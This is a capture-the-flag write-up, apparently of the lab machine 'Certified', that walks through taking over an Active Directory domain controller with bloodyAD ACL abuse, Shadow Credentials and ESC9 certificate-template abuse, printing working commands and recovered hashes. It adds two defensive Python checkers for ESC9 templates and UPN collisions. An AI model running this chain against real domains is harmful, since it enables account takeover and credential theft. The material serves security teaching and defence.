Proof of Concept

10.129.231.186

Nmap

PORT     STATE SERVICE
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
5985/tcp open  wsman

Information Gathering

Collecting host information

┌──(kali㉿kali)-[~/Certified]
└─$ nxc smb 10.129.231.186 --generate-hosts-file hosts
SMB         10.129.231.186  445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
 
┌──(kali㉿kali)-[~/Certified]
└─$ cat hosts
10.129.231.186     DC01.certified.htb certified.htb DC01

Adding the entry to /etc/hosts (Kerberos and LDAP need DC01.certified.htb to resolve, so this is done before any Kerberos-based tooling is run)

┌──(kali㉿kali)-[~/Certified]
└─$ cat /etc/hosts
<SNIP>
10.129.231.186     DC01.certified.htb certified.htb DC01

BloodHound collection with the provided judith.mader credentials (-c All collects ACLs, group membership and sessions, which is what the ACL-abuse steps below are read from)

┌──(kali㉿kali)-[~/Certified]
└─$ bloodhound-python -d 'certified.htb' -u 'judith.mader' -p 'judith09' -ns 10.129.231.186 -c All --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: certified.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.certified.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.certified.htb
INFO: Found 10 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.certified.htb
INFO: Done in 00M 37S
INFO: Compressing output into 20260131175618_bloodhound.zip

Initial Access

judith.mader:judith09 (the credentials provided for this box)

SMB authentication with the provided account succeeds

┌──(kali㉿kali)-[~/Certified]
└─$ nxc smb 10.129.231.186 -u 'judith.mader' -p 'judith09'
SMB         10.129.231.186  445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB         10.129.231.186  445    DC01             [+] certified.htb\judith.mader:judith09

BloodHound review

Change the owner of the Management group to judith.mader. This only works because judith.mader holds WriteOwner over the group; the previous owner SID ends in -512, i.e. Domain Admins.

┌──(kali㉿kali)-[~/Certified]
└─$ bloodyAD -d 'certified.htb' -u 'judith.mader' -p 'judith09' --host 'certified.htb' set owner Management judith.mader
[+] Old owner S-1-5-21-729746778-2675978091-3820388244-512 is now replaced by judith.mader on Management

Grant judith.mader GenericAll on the Management group. As the new owner, judith.mader implicitly has WRITE_DAC on the object and can add the ACE herself.

┌──(kali㉿kali)-[~/Certified]
└─$ bloodyAD -d 'certified.htb' -u 'judith.mader' -p 'judith09' --host 'certified.htb' add genericAll Management judith.mader
[+] judith.mader has now GenericAll on Management

Add judith.mader to the Management group.

┌──(kali㉿kali)-[~/Certified]
└─$ bloodyAD -d 'certified.htb' -u 'judith.mader' -p 'judith09' --host 'certified.htb' add groupMember Management judith.mader
[+] judith.mader added to Management

Run a Shadow Credentials attack to obtain the NT hash of the management_svc account. Membership in Management is what gives write access to management_svc's msDS-KeyCredentialLink attribute: certipy shadow auto adds a key credential, authenticates as management_svc with PKINIT, recovers the NT hash from the PAC credential information in the resulting ticket, and then restores the original attribute value (the two "Restoring"/"restored" lines below). The DNS warning at the top is harmless here because the target was given by IP.

  • NT hash: a091c1832bcdd4677c28b5a6a1295584
┌──(kali㉿kali)-[~/Certified]
└─$ certipy-ad shadow auto -u 'judith.mader@certified.htb' -p 'judith09' -account 'management_svc' -target 10.129.231.186
Certipy v5.0.3 - by Oliver Lyak (ly4k)
 
[!] DNS resolution failed: The DNS query name does not exist: CERTIFIED.HTB.
[!] Use -debug to print a stacktrace
[*] Targeting user 'management_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'b0f02feb0aea40dda7adae76613b3dd8'
[*] Adding Key Credential with device ID 'b0f02feb0aea40dda7adae76613b3dd8' to the Key Credentials for 'management_svc'
[*] Successfully added Key Credential with device ID 'b0f02feb0aea40dda7adae76613b3dd8' to the Key Credentials for 'management_svc'
[*] Authenticating as 'management_svc' with the certificate
[*] Certificate identities:
[*]     No identities found in this certificate
[*] Using principal: 'management_svc@certified.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'management_svc.ccache'
[*] Wrote credential cache to 'management_svc.ccache'
[*] Trying to retrieve NT hash for 'management_svc'
[*] Restoring the old Key Credentials for 'management_svc'
[*] Successfully restored the old Key Credentials for 'management_svc'
[*] NT hash for 'management_svc': a091c1832bcdd4677c28b5a6a1295584

SMB authentication as management_svc succeeds with the recovered hash

┌──(kali㉿kali)-[~/Certified]
└─$ nxc smb 10.129.231.186 -u 'management_svc' -H 'a091c1832bcdd4677c28b5a6a1295584'
SMB         10.129.231.186  445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB         10.129.231.186  445    DC01             [+] certified.htb\management_svc:a091c1832bcdd4677c28b5a6a1295584

WinRM authentication as management_svc succeeds (nxc prints Pwn3d! when the account is allowed to open a remote PowerShell session)

┌──(kali㉿kali)-[~/Certified]
└─$ nxc winrm 10.129.231.186 -u 'management_svc' -H 'a091c1832bcdd4677c28b5a6a1295584'
WINRM       10.129.231.186  5985   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:certified.htb)
WINRM       10.129.231.186  5985   DC01             [+] certified.htb\management_svc:a091c1832bcdd4677c28b5a6a1295584 (Pwn3d!)

WinRM access

┌──(kali㉿kali)-[~/Certified]
└─$ evil-winrm -i 10.129.231.186 -u 'management_svc' -H 'a091c1832bcdd4677c28b5a6a1295584'
 
Evil-WinRM shell v3.7
 
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
 
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
 
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\management_svc\Documents>

Read user.txt

*Evil-WinRM* PS C:\Users\management_svc\Desktop> type user.txt
0d3887eec55c7706eaf12e0d2de8613a
*Evil-WinRM* PS C:\Users\management_svc\Desktop> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : .htb
   IPv4 Address. . . . . . . . . . . : 10.129.231.186
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : 10.129.0.1

Privilege Escalation

BloodHound review: management_svc has GenericAll over the ca_operator account.

Change the CA_OPERATOR password to "1q2w3e4r". A password reset is the noisiest option (it locks the real owner out and is logged as event 4724 on the DC); with GenericAll, the same Shadow Credentials technique used above would also work against ca_operator without touching its password.

┌──(kali㉿kali)-[~/Certified]
└─$ bloodyAD -d 'certified.htb' -u 'management_svc' -p ':a091c1832bcdd4677c28b5a6a1295584' --host 'certified.htb' set password CA_OPERATOR 1q2w3e4r
[+] Password changed successfully!

SMB authentication succeeds with the new password

┌──(kali㉿kali)-[~/Certified]
└─$ nxc smb certified.htb -u 'CA_OPERATOR' -p '1q2w3e4r'
SMB         10.129.231.186  445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB         10.129.231.186  445    DC01             [+] certified.htb\CA_OPERATOR:1q2w3e4r

Certipy vulnerable-template scan. The two "Error checking web enrollment: timed out" lines only mean the CA's HTTP/HTTPS enrollment endpoints did not answer; the template data was already collected over LDAP and the CA configuration over the remote registry (RRP), which is all the findings below need.

┌──(kali㉿kali)-[~/Certified]
└─$ certipy-ad find -vulnerable -u ca_operator -p 1q2w3e4r -dc-ip 10.129.231.186 -target-ip 10.129.231.186
Certipy v5.0.3 - by Oliver Lyak (ly4k)
 
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 15 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'certified-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'certified-DC01-CA'
[*] Checking web enrollment for CA 'certified-DC01-CA' @ 'DC01.certified.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Saving text output to '20260201051110_Certipy.txt'
[*] Wrote text output to '20260201051110_Certipy.txt'
[*] Saving JSON output to '20260201051110_Certipy.json'
[*] Wrote JSON output to '20260201051110_Certipy.json'

ESC9 found on the CertifiedAuthentication template. Its Enrollment Flag includes NoSecurityExtension, so certificates issued from it carry no szOID_NTDS_CA_SECURITY_EXT extension (the SID binding Microsoft introduced with KB5014754), and the only enrollment principal outside the admin groups is CERTIFIED.HTB\operator ca, which is the ca_operator account. The remark from Certipy matters: ESC9 only pays off when the DC is not in full enforcement (StrongCertificateBindingEnforcement set to 2) and when the attacker can write the userPrincipalName of an account that is allowed to enroll, which is exactly what management_svc's GenericAll over ca_operator provides.

┌──(kali㉿kali)-[~/Certified]
└─$ cat 20260201051110_Certipy.txt
<SNIP>
Certificate Templates
  0
    Template Name                       : CertifiedAuthentication
    Display Name                        : Certified Authentication
    Certificate Authorities             : certified-DC01-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireUpn
                                          SubjectRequireDirectoryPath
    Enrollment Flag                     : PublishToDs
                                          AutoEnrollment
                                          NoSecurityExtension
    Extended Key Usage                  : Server Authentication
                                          Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 2
    Validity Period                     : 1000 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2024-05-13T15:48:52+00:00
    Template Last Modified              : 2024-05-13T15:55:20+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : CERTIFIED.HTB\operator ca
                                          CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : CERTIFIED.HTB\Administrator
        Full Control Principals         : CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
        Write Owner Principals          : CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
        Write Dacl Principals           : CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
        Write Property Enroll           : CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
    [+] User Enrollable Principals      : CERTIFIED.HTB\operator ca
    [!] Vulnerabilities
      ESC9                              : Template has no security extension.
    [*] Remarks
      ESC9                              : Other prerequisites may be required for this to be exploitable. See the wiki for more details.
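As an added example (not part of the original writeup and not Certipy's own code), a small Python checker that parses Certipy's text report into one record per template and applies the ESC9 conditions itself, so the "Template has no security extension" flag above can be reproduced and explained rather than taken on trust. The report text in the block is constructed: the first template copies the CertifiedAuthentication settings above, the second is an assumed hardened copy of it without NoSecurityExtension. The checker cannot see the DC's StrongCertificateBindingEnforcement value, which is the prerequisite Certipy's remark refers to.

```python
"""Audit a Certipy 'find' text report for ESC9-shaped templates.

Added example: not from the writeup and not Certipy's own code. The
SAMPLE_REPORT below is constructed to mirror Certipy's text format.
"""
import re

# Principals expected to hold enrollment rights; anything else is treated
# as low-privileged for the purpose of the ESC9 check.
PRIVILEGED = {"domain admins", "enterprise admins", "administrator"}

# Each template in the report starts with a bare index line: "  0", "  1", ...
TEMPLATE_START = re.compile(r"^\s*\d+\s*$")
# Multi-valued fields continue on lines indented to the value column.
CONTINUATION_INDENT = " " * 20


def parse_certipy_templates(report):
    """Return one dict per template: field label -> list of values.

    Labels are the text left of ' : ' (e.g. 'Enrollment Flag'); leading
    '[+]'/'[!]'/'[*]' markers are stripped. A line without ' : ' that is
    indented to the value column continues the previous field; any other
    such line is a section header ('Permissions') and resets the context.
    """
    templates, current, last_key = [], None, None
    for raw in report.splitlines():
        if TEMPLATE_START.match(raw):
            current = {}
            templates.append(current)
            last_key = None
        elif current is None:
            continue
        elif " : " in raw:
            key, value = raw.split(" : ", 1)
            key = re.sub(r"^\[[+!*]\]\s*", "", key.strip())
            current[key] = [value.strip()]
            last_key = key
        elif last_key and raw.startswith(CONTINUATION_INDENT) and raw.strip():
            current[last_key].append(raw.strip())
        else:
            last_key = None
    return templates


def is_true(template, key):
    """True when a Certipy boolean field reads 'True'."""
    return template.get(key, ["False"])[0] == "True"


def esc9_enrollers(template):
    """Low-privileged principals that can enroll in an ESC9-shaped template.

    Returns an empty list when the template does not qualify. The checks
    follow the ESC9 shape: enabled, client authentication, the
    NoSecurityExtension enrollment flag (issued certificates lack the
    szOID_NTDS_CA_SECURITY_EXT SID), and no manager-approval or
    co-signature gate. Whether a DC accepts such a certificate depends on
    StrongCertificateBindingEnforcement, which the report does not show.
    """
    if not is_true(template, "Enabled") or not is_true(template, "Client Authentication"):
        return []
    if "NoSecurityExtension" not in template.get("Enrollment Flag", []):
        return []
    if is_true(template, "Requires Manager Approval"):
        return []
    if template.get("Authorized Signatures Required", ["0"])[0] != "0":
        return []
    low_priv = []
    for principal in template.get("Enrollment Rights", []):
        account = principal.split("\\", 1)[-1].strip().lower()
        if account not in PRIVILEGED:
            low_priv.append(principal)
    return low_priv


def audit(report):
    """Map template name -> low-privileged enrollers for each ESC9 candidate."""
    findings = {}
    for template in parse_certipy_templates(report):
        enrollers = esc9_enrollers(template)
        if enrollers:
            findings[template.get("Template Name", ["?"])[0]] = enrollers
    return findings


# Constructed report: template 0 copies the writeup's vulnerable settings,
# template 1 is an assumed hardened variant without NoSecurityExtension.
SAMPLE_REPORT = """\
Certificate Templates
  0
    Template Name                       : CertifiedAuthentication
    Enabled                             : True
    Client Authentication               : True
    Enrollment Flag                     : PublishToDs
                                          AutoEnrollment
                                          NoSecurityExtension
    Requires Manager Approval           : False
    Authorized Signatures Required      : 0
    Permissions
      Enrollment Permissions
        Enrollment Rights               : CERTIFIED.HTB\\operator ca
                                          CERTIFIED.HTB\\Domain Admins
                                          CERTIFIED.HTB\\Enterprise Admins
  1
    Template Name                       : HardenedAuthentication
    Enabled                             : True
    Client Authentication               : True
    Enrollment Flag                     : PublishToDs
                                          AutoEnrollment
    Requires Manager Approval           : False
    Authorized Signatures Required      : 0
    Permissions
      Enrollment Permissions
        Enrollment Rights               : CERTIFIED.HTB\\operator ca
"""

if __name__ == "__main__":
    for name, who in audit(SAMPLE_REPORT).items():
        print(f"ESC9 candidate: {name} enrollable by {', '.join(who)}")
```

Point it at the real Certipy text file (the 2026...Certipy.txt above) instead of SAMPLE_REPORT to re-derive the finding from the full 34-template report; the template parser also serves as a base for the other ESC checks, which differ only in the fields they test.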

Using management_svc, which has GenericAll over ca_operator, set ca_operator's userPrincipalName to Administrator. Because the template omits the SID extension, the DC maps the resulting certificate to an account through the UPN in its SAN, so the UPN decides whom the certificate authenticates as.

┌──(kali㉿kali)-[~/Certified]
└─$ certipy-ad account update -u 'management_svc' -hashes ':a091c1832bcdd4677c28b5a6a1295584' -dc-ip 10.129.231.186 -user 'ca_operator' -upn 'Administrator'
Certipy v5.0.3 - by Oliver Lyak (ly4k)
 
[*] Updating user 'ca_operator':
    userPrincipalName                   : Administrator
[*] Successfully updated 'ca_operator'

Request a certificate as ca_operator from the ESC9 template (CertifiedAuthentication). The issued certificate carries the SAN UPN 'Administrator' and, as expected for a NoSecurityExtension template, no object SID.

┌──(kali㉿kali)-[~/Certified]
└─$ certipy-ad req -u 'ca_operator' -p '1q2w3e4r' -dc-ip 10.129.231.186 -target 'certified.htb' -ca 'certified-DC01-CA' -template 'CertifiedAuthentication'
Certipy v5.0.3 - by Oliver Lyak (ly4k)
 
[*] Requesting certificate via RPC
[*] Request ID is 16
[*] Successfully requested certificate
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'

Revert the ca_operator UPN. The value set below, ca_operator.certified.htb, is not a well-formed UPN (it has no '@'); the intended value is ca_operator@certified.htb. It still serves the purpose here, which is to make sure no account carries the userPrincipalName 'Administrator' when the certificate is presented, so the KDC falls through to matching the SAN UPN against the Administrator account's own name.

┌──(kali㉿kali)-[~/Certified]
└─$ certipy-ad account update -u 'management_svc' -hashes ':a091c1832bcdd4677c28b5a6a1295584' -dc-ip 10.129.231.186 -user 'ca_operator' -upn 'ca_operator.certified.htb'
Certipy v5.0.3 - by Oliver Lyak (ly4k)
 
[*] Updating user 'ca_operator':
    userPrincipalName                   : ca_operator.certified.htb
[*] Successfully updated 'ca_operator'
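To make the two account updates above concrete from the defender's side, an added example (not from the writeup and not Certipy code) that audits a set of user records for UPNs that point at another account or are malformed. It flags the hijacked state created by the first update (ca_operator carrying the UPN 'Administrator') and also the dotted value used in the revert, which is not a valid UPN. The user records and the DOMAIN constant are constructed snapshots for the example, not live LDAP data; the attribute names are the real AD ones.

```python
"""Detect userPrincipalName values that shadow or collide with other accounts.

Added example, not from the writeup. ESC9/ESC10 work because a certificate
issued without the SID security extension is mapped to an account through
the UPN in its SAN, so an attacker with write access to a victim's UPN
points it at a privileged name. The records below are constructed.
"""

DOMAIN = "certified.htb"  # assumed realm for the constructed snapshot

# Constructed snapshot after 'certipy account update ... -upn Administrator'
USERS_MID_ATTACK = [
    ("Administrator", "administrator@certified.htb"),
    ("judith.mader", "judith.mader@certified.htb"),
    ("management_svc", "management_svc@certified.htb"),
    ("ca_operator", "Administrator"),
]

# Constructed snapshot after the writeup's revert command
USERS_AFTER_REVERT = [
    ("Administrator", "administrator@certified.htb"),
    ("ca_operator", "ca_operator.certified.htb"),
]


def canonical_upn(sam, domain=DOMAIN):
    """The UPN an account is normally expected to carry: sAMAccountName@domain."""
    return f"{sam}@{domain}"


def find_upn_anomalies(users, domain=DOMAIN):
    """Return sorted (sAMAccountName, userPrincipalName, reason) findings.

    reasons:
      no-realm       the UPN has no '@realm' part (a bare name such as 'Administrator')
      foreign-realm  the realm is not this domain
      collision      the name left of '@' is another account's sAMAccountName, so
                     this UPN shadows that account's implicit UPN; that is the
                     state the writeup creates before requesting the certificate
    """
    sam_by_lower = {sam.lower(): sam for sam, _ in users}
    findings = []
    for sam, upn in users:
        if not upn:
            continue  # accounts without a UPN cannot be matched by UPN at all
        name, sep, realm = upn.partition("@")
        if not sep:
            findings.append((sam, upn, "no-realm"))
        elif realm.lower() != domain.lower():
            findings.append((sam, upn, "foreign-realm"))
        owner = sam_by_lower.get(name.lower())
        if owner is not None and owner != sam:
            findings.append((sam, upn, "collision"))
    return sorted(findings)


if __name__ == "__main__":
    for label, snapshot in (("mid-attack", USERS_MID_ATTACK), ("after revert", USERS_AFTER_REVERT)):
        print(label)
        for sam, upn, reason in find_upn_anomalies(snapshot):
            print(f"  {sam}: userPrincipalName={upn!r} -> {reason}, expected {canonical_upn(sam)}")
```

Fed a real export of sAMAccountName and userPrincipalName pulled over LDAP, the 'collision' reason is the one worth alerting on; in real time the same change shows up as a 4738 "A user account was changed" event on the DC with the User Principal Name field populated.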

Authenticate as Administrator with the certificate and retrieve the Administrator NT hash (the leading aad3b435b51404eeaad3b435b51404ee is the empty LM hash placeholder; the NT hash is the second half)

┌──(kali㉿kali)-[~/Certified]
└─$ certipy-ad auth -pfx 'administrator.pfx' -username 'administrator' -domain 'certified.htb' -dc-ip 10.129.231.186
Certipy v5.0.3 - by Oliver Lyak (ly4k)
 
[*] Certificate identities:
[*]     SAN UPN: 'Administrator'
[*] Using principal: 'administrator@certified.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@certified.htb': aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34

WinRM access with the recovered Administrator NT hash

┌──(kali㉿kali)-[~/Certified]
└─$ evil-winrm -i 10.129.231.186 -u 'administrator' -H '0d5b49608bbce1751f708748f67e2d34'
 
Evil-WinRM shell v3.7
 
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
 
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
 
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>

Read root.txt

*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
144201af105364df3965d488505dd6ed
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : .htb
   IPv4 Address. . . . . . . . . . . : 10.129.231.186
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : 10.129.0.1